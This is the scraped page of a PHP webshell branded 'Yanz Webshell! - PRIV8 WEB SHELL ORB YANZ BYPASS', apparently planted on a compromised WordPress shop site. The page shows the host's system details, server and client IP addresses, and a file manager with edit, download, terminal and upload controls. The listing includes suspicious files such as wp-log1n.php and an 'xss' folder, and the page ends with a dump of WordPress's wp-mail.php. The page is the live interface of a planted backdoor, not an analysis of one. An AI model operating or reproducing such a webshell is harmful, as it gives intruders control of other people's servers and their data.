Attention:
Uname:
Php:
Hdd:
Cwd:

Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux vps28228 5.15.0-94-generic #104~20.04.1-Ubuntu SMP Tue Jan 16 13:34:09 UTC 2024 x86_64
8.1.25 Safe mode: OFF Datetime: 2024-11-21 20:52:35
117.56 GB Free: 4.93 GB (4%)
/home/dh_mjkyp4/biotonicbeautyshop.com/ dr-xr-xr-x [ root ] [ home ] Text

Server IP:
75.119.221.42
Client IP:
3.142.156.58

[ Files ]	[ Logout ]

File manager

	Name	Size	Modify	Permissions	Actions
	[ . ]	dir	2024-11-21 20:49:32	dr-xr-xr-x	Rename Touch
	[ .. ]	dir	2024-11-02 11:56:04	dr-xr-xr-x	Rename Touch
	[ .dh-diag ]	link	2024-10-18 04:42:11	drwxr-xr-x	Rename Touch
	[ .well-known ]	dir	2024-11-02 23:11:10	dr-xr-xr-x	Rename Touch
	[ cache ]	dir	2024-11-20 21:40:23	dr-xr-xr-x	Rename Touch
	[ ced19 ]	dir	2024-11-18 15:24:30	dr-xr-xr-x	Rename Touch
	[ images ]	dir	2024-11-20 21:40:30	dr-xr-xr-x	Rename Touch
	[ wp-admin ]	dir	2024-11-20 21:40:23	dr-xr-xr-x	Rename Touch
	[ wp-content ]	dir	2024-11-21 20:43:48	dr-xr-xr-x	Rename Touch
	[ wp-include ]	dir	2024-11-20 21:40:23	dr-xr-xr-x	Rename Touch
	[ wp-includes ]	dir	2024-11-18 23:41:19	dr-xr-xr-x	Rename Touch
	[ wp-login ]	dir	2024-11-20 21:40:24	dr-xr-xr-x	Rename Touch
	[ wp-theme ]	dir	2024-11-20 21:40:24	dr-xr-xr-x	Rename Touch
	[ xss ]	dir	2024-11-20 21:40:24	dr-xr-xr-x	Rename Touch
	.htaccess	917 B	2024-11-21 20:52:35	-r--r--r--	Rename Touch Edit Download
	click.php	1.92 KB	2022-10-12 15:24:14	-r-xr-xr-x	Rename Touch Edit Download
	defaults.php	1.12 KB	2022-06-17 15:24:09	-r-xr-xr-x	Rename Touch Edit Download
	favicon.gif	0 B	2024-09-24 22:29:22	-r-xr-xr-x	Rename Touch Edit Download
	favicon.ico	0 B	2024-09-24 22:29:22	-r-xr-xr-x	Rename Touch Edit Download
	google0044ab520dd9afaf.html	53 B	2024-09-24 17:43:02	-r-xr-xr-x	Rename Touch Edit Download
	googlebdb35ae89b3e9606.html	53 B	2024-09-24 17:43:02	-r-xr-xr-x	Rename Touch Edit Download
	googledcd71584448cbfbf.html	53 B	2024-09-18 17:56:28	-r-xr-xr-x	Rename Touch Edit Download
	htaccess.th	709 B	2024-11-20 21:40:44	-r-xr-xr-x	Rename Touch Edit Download
	index.php	1.83 KB	2024-11-21 20:52:35	-r--r--r--	Rename Touch Edit Download
	index.php0	10.70 KB	2022-09-07 15:23:56	-r-xr-xr-x	Rename Touch Edit Download
	item.php	1.92 KB	2022-07-13 15:23:57	-r-xr-xr-x	Rename Touch Edit Download
	license.txt	19.45 KB	2024-01-01 09:02:19	-r-xr-xr-x	Rename Touch Edit Download
	mah.php	1.96 KB	2022-08-19 15:24:14	-r-xr-xr-x	Rename Touch Edit Download
	networks.php	1.29 KB	2022-11-04 15:24:09	-r-xr-xr-x	Rename Touch Edit Download
	options.php	1.99 KB	2022-06-15 15:23:57	-r-xr-xr-x	Rename Touch Edit Download
	plugins.php	412 B	2023-02-03 15:24:09	-r-xr-xr-x	Rename Touch Edit Download
	readme.html	7.24 KB	2024-09-12 03:39:28	-r-xr-xr-x	Rename Touch Edit Download
	robots.txt	384 B	2022-04-28 15:24:14	-r-xr-xr-x	Rename Touch Edit Download
	shop.php	1.01 KB	2023-02-18 15:23:57	-r-xr-xr-x	Rename Touch Edit Download
	userfuns.php	36.24 KB	2024-09-24 15:11:55	-r-xr-xr-x	Rename Touch Edit Download
	wp-activate.php	7.21 KB	2024-02-13 23:19:09	-r-xr-xr-x	Rename Touch Edit Download
	wp-blog-header.php	370 B	2024-09-24 18:22:54	-r-xr-xr-x	Rename Touch Edit Download
	wp-comments-post.php	2.27 KB	2023-06-14 23:11:16	-r-xr-xr-x	Rename Touch Edit Download
	wp-config-sample.php	2.96 KB	2024-03-11 23:08:10	-r-xr-xr-x	Rename Touch Edit Download
	wp-config.php	3.93 KB	2024-09-24 18:22:54	-r-xr-xr-x	Rename Touch Edit Download
	wp-cron.php	5.51 KB	2023-05-31 03:48:19	-r-xr-xr-x	Rename Touch Edit Download
	wp-links-opml.php	2.44 KB	2022-11-27 06:01:17	-r-xr-xr-x	Rename Touch Edit Download
	wp-load.php	3.84 KB	2024-09-24 18:22:54	-r-xr-xr-x	Rename Touch Edit Download
	wp-log1n.php	1.29 KB	2022-12-24 15:24:14	-r-xr-xr-x	Rename Touch Edit Download
	wp-login.php	66.04 KB	2024-05-28 20:13:12	-r-xr-xr-x	Rename Touch Edit Download
	wp-mail.php	8.33 KB	2023-09-16 15:50:23	-r-xr-xr-x	Rename Touch Edit Download
	wp-settings.php	28.10 KB	2024-09-24 18:22:54	-r-xr-xr-x	Rename Touch Edit Download
	wp-signup.php	33.58 KB	2023-06-20 03:27:27	-r-xr-xr-x	Rename Touch Edit Download
	wp-trackback.php	4.77 KB	2023-06-22 23:36:26	-r-xr-xr-x	Rename Touch Edit Download
	xmlrpc.php	3.17 KB	2024-03-02 22:49:06	-r-xr-xr-x	Rename Touch Edit Download
	xmlrpc.php.0	0 B	2024-11-20 21:24:01	-r-xr-xr-x	Rename Touch Edit Download

Change dir:	Read file:
Make dir: (Not writable)	Make file: (Not writable)
Terminal:	Upload file: (Not writable)

Writing * * @package WordPress */ /** Make sure that the WordPress bootstrap has run before continuing. */ require __DIR__ . '/wp-load.php'; /** This filter is documented in wp-admin/options.php */ if ( ! apply_filters( 'enable_post_by_email_configuration', true ) ) { wp_die( __( 'This action has been disabled by the administrator.' ), 403 ); } $mailserver_url = get_option( 'mailserver_url' ); if ( 'mail.example.com' === $mailserver_url || empty( $mailserver_url ) ) { wp_die( __( 'This action has been disabled by the administrator.' ), 403 ); } /** * Fires to allow a plugin to do a complete takeover of Post by Email. * * @since 2.9.0 */ do_action( 'wp-mail.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /** Get the POP3 class with which to access the mailbox. */ require_once ABSPATH . WPINC . '/class-pop3.php'; /** Only check at this interval for new messages. */ if ( ! defined( 'WP_MAIL_INTERVAL' ) ) { define( 'WP_MAIL_INTERVAL', 5 * MINUTE_IN_SECONDS ); } $last_checked = get_transient( 'mailserver_last_checked' ); if ( $last_checked ) { wp_die( __( 'Slow down cowboy, no need to check for new mails so often!' ) ); } set_transient( 'mailserver_last_checked', true, WP_MAIL_INTERVAL ); $time_difference = get_option( 'gmt_offset' ) * HOUR_IN_SECONDS; $phone_delim = '::'; $pop3 = new POP3(); if ( ! $pop3->connect( get_option( 'mailserver_url' ), get_option( 'mailserver_port' ) ) || ! $pop3->user( get_option( 'mailserver_login' ) ) ) { wp_die( esc_html( $pop3->ERROR ) ); } $count = $pop3->pass( get_option( 'mailserver_pass' ) ); if ( false === $count ) { wp_die( esc_html( $pop3->ERROR ) ); } if ( 0 === $count ) { $pop3->quit(); wp_die( __( 'There does not seem to be any new mail.' ) ); } // Always run as an unauthenticated user. wp_set_current_user( 0 ); for ( $i = 1; $i <= $count; $i++ ) { $message = $pop3->get( $i ); $bodysignal = false; $boundary = ''; $charset = ''; $content = ''; $content_type = ''; $content_transfer_encoding = ''; $post_author = 1; $author_found = false; $post_date = null; $post_date_gmt = null; foreach ( $message as $line ) { // Body signal. if ( strlen( $line ) < 3 ) { $bodysignal = true; } if ( $bodysignal ) { $content .= $line; } else { if ( preg_match( '/Content-Type: /i', $line ) ) { $content_type = trim( $line ); $content_type = substr( $content_type, 14, strlen( $content_type ) - 14 ); $content_type = explode( ';', $content_type ); if ( ! empty( $content_type[1] ) ) { $charset = explode( '=', $content_type[1] ); $charset = ( ! empty( $charset[1] ) ) ? trim( $charset[1] ) : ''; } $content_type = $content_type[0]; } if ( preg_match( '/Content-Transfer-Encoding: /i', $line ) ) { $content_transfer_encoding = trim( $line ); $content_transfer_encoding = substr( $content_transfer_encoding, 27, strlen( $content_transfer_encoding ) - 27 ); $content_transfer_encoding = explode( ';', $content_transfer_encoding ); $content_transfer_encoding = $content_transfer_encoding[0]; } if ( 'multipart/alternative' === $content_type && str_contains( $line, 'boundary="' ) && '' === $boundary ) { $boundary = trim( $line ); $boundary = explode( '"', $boundary ); $boundary = $boundary[1]; } if ( preg_match( '/Subject: /i', $line ) ) { $subject = trim( $line ); $subject = substr( $subject, 9, strlen( $subject ) - 9 ); // Captures any text in the subject before $phone_delim as the subject. if ( function_exists( 'iconv_mime_decode' ) ) { $subject = iconv_mime_decode( $subject, 2, get_option( 'blog_charset' ) ); } else { $subject = wp_iso_descrambler( $subject ); } $subject = explode( $phone_delim, $subject ); $subject = $subject[0]; } /* * Set the author using the email address (From or Reply-To, the last used) * otherwise use the site admin. */ if ( ! $author_found && preg_match( '/^(From|Reply-To): /', $line ) ) { if ( preg_match( '|[a-z0-9_.-]+@[a-z0-9_.-]+(?!.*<)|i', $line, $matches ) ) { $author = $matches[0]; } else { $author = trim( $line ); } $author = sanitize_email( $author ); if ( is_email( $author ) ) { $userdata = get_user_by( 'email', $author ); if ( ! empty( $userdata ) ) { $post_author = $userdata->ID; $author_found = true; } } } if ( preg_match( '/Date: /i', $line ) ) { // Of the form '20 Mar 2002 20:32:37 +0100'. $ddate = str_replace( 'Date: ', '', trim( $line ) ); // Remove parenthesized timezone string if it exists, as this confuses strtotime(). $ddate = preg_replace( '!\s*\(.+\)\s*$!', '', $ddate ); $ddate_timestamp = strtotime( $ddate ); $post_date = gmdate( 'Y-m-d H:i:s', $ddate_timestamp + $time_difference ); $post_date_gmt = gmdate( 'Y-m-d H:i:s', $ddate_timestamp ); } } } // Set $post_status based on $author_found and on author's publish_posts capability. if ( $author_found ) { $user = new WP_User( $post_author ); $post_status = ( $user->has_cap( 'publish_posts' ) ) ? 'publish' : 'pending'; } else { // Author not found in DB, set status to pending. Author already set to admin. $post_status = 'pending'; } $subject = trim( $subject ); if ( 'multipart/alternative' === $content_type ) { $content = explode( '--' . $boundary, $content ); $content = $content[2]; // Match case-insensitive Content-Transfer-Encoding. if ( preg_match( '/Content-Transfer-Encoding: quoted-printable/i', $content, $delim ) ) { $content = explode( $delim[0], $content ); $content = $content[1]; } $content = strip_tags( $content, '

' ); } $content = trim( $content ); /** * Filters the original content of the email. * * Give Post-By-Email extending plugins full access to the content, either * the raw content, or the content of the last quoted-printable section. * * @since 2.8.0 * * @param string $content The original email content. */ $content = apply_filters( 'wp_mail_original_content', $content ); if ( false !== stripos( $content_transfer_encoding, 'quoted-printable' ) ) { $content = quoted_printable_decode( $content ); } if ( function_exists( 'iconv' ) && ! empty( $charset ) ) { $content = iconv( $charset, get_option( 'blog_charset' ), $content ); } // Captures any text in the body after $phone_delim as the body. $content = explode( $phone_delim, $content ); $content = empty( $content[1] ) ? $content[0] : $content[1]; $content = trim( $content ); /** * Filters the content of the post submitted by email before saving. * * @since 1.2.0 * * @param string $content The email content. */ $post_content = apply_filters( 'phone_content', $content ); $post_title = xmlrpc_getposttitle( $content ); if ( '' === trim( $post_title ) ) { $post_title = $subject; } $post_category = array( get_option( 'default_email_category' ) ); $post_data = compact( 'post_content', 'post_title', 'post_date', 'post_date_gmt', 'post_author', 'post_category', 'post_status' ); $post_data = wp_slash( $post_data ); $post_ID = wp_insert_post( $post_data ); if ( is_wp_error( $post_ID ) ) { echo "\n" . $post_ID->get_error_message(); } // The post wasn't inserted or updated, for whatever reason. Better move forward to the next email. if ( empty( $post_ID ) ) { continue; } /** * Fires after a post submitted by email is published. * * @since 1.2.0 * * @param int $post_ID The post ID. */ do_action( 'publish_phone', $post_ID ); echo "\n
" . __( 'Author:' ) . ' ' . esc_html( $post_author ) . '
'; echo "\n
" . __( 'Posted title:' ) . ' ' . esc_html( $post_title ) . '
'; if ( ! $pop3->delete( $i ) ) { echo '
' . sprintf( /* translators: %s: POP3 error. */ __( 'Oops: %s' ), esc_html( $pop3->ERROR ) ) . '
'; $pop3->reset(); exit; } else { echo '
' . sprintf( /* translators: %s: The message ID. */ __( 'Mission complete. Message %s deleted.' ), '' . $i . '' ) . '
'; } } $pop3->quit();